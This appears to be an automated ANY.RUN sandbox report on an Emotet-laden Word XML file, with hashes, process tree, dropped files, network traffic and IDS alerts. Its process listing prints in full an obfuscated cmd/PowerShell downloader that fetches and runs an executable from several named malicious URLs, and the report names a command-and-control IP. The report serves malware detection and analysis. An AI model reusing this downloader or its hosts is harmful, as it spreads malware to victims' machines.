analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b202392b8e7a6e42d4916f052de6fc02

Full analysis: https://app.any.run/tasks/580f6b45-b691-47d0-9645-cc6b84f85493
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 17, 2019, 22:20:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

B202392B8E7A6E42D4916F052DE6FC02

SHA1:

854ECE5881DF3412DF15289079C98CF299F3E43C

SHA256:

9C72D2A9E0873BE2788BCF5DBFFB5C7BB89208263B407066962C2C8B874E8F26

SSDEEP:

6144:6v/ybBPDDMkqWqs6vOtX0OEDzYUTE7yZRVUi8E:4/GJsOtX0BzEmZRGi7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3812)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2556)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2556)
    • Application was dropped or rewritten from another process

      • 486.exe (PID: 2444)
      • 486.exe (PID: 3108)
      • wabmetagen.exe (PID: 656)
      • wabmetagen.exe (PID: 3100)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2336)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3100)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3100)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2836)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2336)
      • 486.exe (PID: 2444)
    • Creates files in the user directory

      • powershell.exe (PID: 2336)
    • Application launched itself

      • 486.exe (PID: 3108)
    • Starts itself from another location

      • 486.exe (PID: 2444)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2556)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2556)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 005241E0
WordDocumentBodySectPRsidRDefault: 00554C54
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00554C54
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 96630 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 100
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 86
WordDocumentDocumentPropertiesWords: 15
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs powershell.exe 486.exe no specs 486.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2836"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\b202392b8e7a6e42d4916f052de6fc02.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2556"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b202392b8e7a6e42d4916f052de6fc02.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3812"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2336powershell $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3108"C:\Users\Public\486.exe" C:\Users\Public\486.exepowershell.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
2444"C:\Users\Public\486.exe"C:\Users\Public\486.exe
486.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
656"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe486.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.4: 2003062408
3100"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Mozilla, Netscape
Integrity Level:
MEDIUM
Version:
1.4: 2003062408
Total events
1 796
Read events
1 381
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9522.tmp.cvr
MD5:
SHA256:
2556WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8C062112.jpg
MD5:
SHA256:
2336powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6QKDDSEUN1JC5A2QVJPA.temp
MD5:
SHA256:
2556WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:41379A924454D4DBF21EC8153C20C10F
SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80
2444486.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:5C55696D5718AFE8453832950518EE57
SHA256:CFDDB0D4391054ADB4D130A3239EA1A30E1CBC8044810DD89BAF31E005916304
2336powershell.exeC:\Users\Public\486.exeexecutable
MD5:5C55696D5718AFE8453832950518EE57
SHA256:CFDDB0D4391054ADB4D130A3239EA1A30E1CBC8044810DD89BAF31E005916304
2336powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a231.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
2556WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$02392b8e7a6e42d4916f052de6fc02.xmlpgc
MD5:82B2006F14889DB6274F448EEBBB219B
SHA256:15964CFDBF79BA26438CD179A89779C486750D01CC1F72330E24B24DAE225FEB
2336powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2336
powershell.exe
GET
200
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh/
ZA
executable
170 Kb
malicious
2336
powershell.exe
GET
301
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh
ZA
html
254 b
malicious
3100
wabmetagen.exe
GET
200
190.138.221.70:53
http://190.138.221.70:53/
AR
binary
22.4 Kb
malicious
3100
wabmetagen.exe
GET
200
190.138.221.70:53
http://190.138.221.70:53/
AR
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3100
wabmetagen.exe
190.138.221.70:53
Telecom Argentina S.A.
AR
malicious
2336
powershell.exe
154.0.164.160:80
fleetstreetstudios.co.za
Afrihost
ZA
suspicious

DNS requests

Domain
IP
Reputation
fleetstreetstudios.co.za
  • 154.0.164.160
malicious

Threats

PID
Process
Class
Message
2336
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2336
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2336
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3100
wabmetagen.exe
A Network Trojan was detected
ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile
3100
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3100
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3100
wabmetagen.exe
A Network Trojan was detected
ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile
3100
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3100
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
No debug info